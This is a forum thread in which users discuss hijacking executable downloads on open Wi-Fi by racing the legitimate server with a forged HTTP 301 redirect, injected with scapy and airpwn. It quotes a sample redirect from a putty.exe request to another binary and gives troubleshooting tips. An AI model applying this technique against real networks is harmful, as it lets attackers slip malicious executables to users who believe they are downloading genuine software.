I believe this is called header injection.
h**p://rturf.net/documentum/?View=entry&EntryID=272
Another
h**p://i8jesus.com/?p=18
replacing .exe on a broadcast network
does anyone have any knowledge regarding replacing .exe file request on a broadcast network by exploiting a race condition... from what i understand at the moment one can sniff network traffic and on finding the "content-type:application" as a request respond to it with his own binary file,,, i think this would be even more cool than using ettercap filters and injecting code on the fly into an html page....
if this is possible it can also lead to a whole new kind of injection attack in 802.11 network where an attacker can send data to the victim with out even being associated to the AP.
I believe this is called header injection.
h**p://rturf.net/documentum/?View=entry&EntryID=272
Another
h**p://i8jesus.com/?p=18
Thanks a lot,,, it looks like HTTP 301 response is the best thing to do i have even seen an ettercap filter doing the same... will try to implement this using scapy on a wifi network,,, now must sit and start reading up on TCP to understand how the sequence number and ack numbers works and how the checksum is calculated...
there is another way of accomplishing this,,, we can write a customised tcp stack which should race and respond to the GET request,, but the problem is this might become too complicated since i am trying to do using packet injection for a 802.11 network with out being associated to the AP.& i dunno how to handle and send executable files in packets... although i would like to learn about it anybody who could put some light on this topic or point me to some interesting article would be great... any suggestions or alternative way of doing this will also be greatly appreciated.
Wifitap, which uses scapy, might have some keys to the puzzle.Originally Posted by Cryptid
dd if=/dev/swc666 of=/dev/wyze
alright i have acheived some progress but im stuck again
when a get request is being made say
i am repling back with a 301 response as suchCode:GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1 Host: the.earth.li
but the resultant is turning out to be a request made toCode:HTTP/1.1 301 Moved Permanently Location: http://spool.metasploit.com/releases/framework-3.2.exe
can anyone point me out to what i am doing wrong.Code:/releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe
What tool are you using to do this?
One thing Mister_X kindly shedded on light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've neve got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.
dd if=/dev/swc666 of=/dev/wyze
the problem was the 301 response had to end with a \r\n which was missing, therefore the problem occured now its working but there is another problem the race conditon is effectively being exploited only the first time since the first response being generated is inducing some amount of latency in the program all the other get request are being retrieved from a buffer which are already being serviced by the authentic source therefore no more race condition exists because the program becomes slow and looses the race... any help with the program will be appreciated greatly
at the moment the only solution i think to the problem is that somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing when the program is injecting the packet.
by the way i am using scapy.
even i faced the same problem with airpwn for sometime but later on figured out that running airodump using the "-c" on the same channel as the victime network gets airpwn to correctly inject the data.
Posting Permissions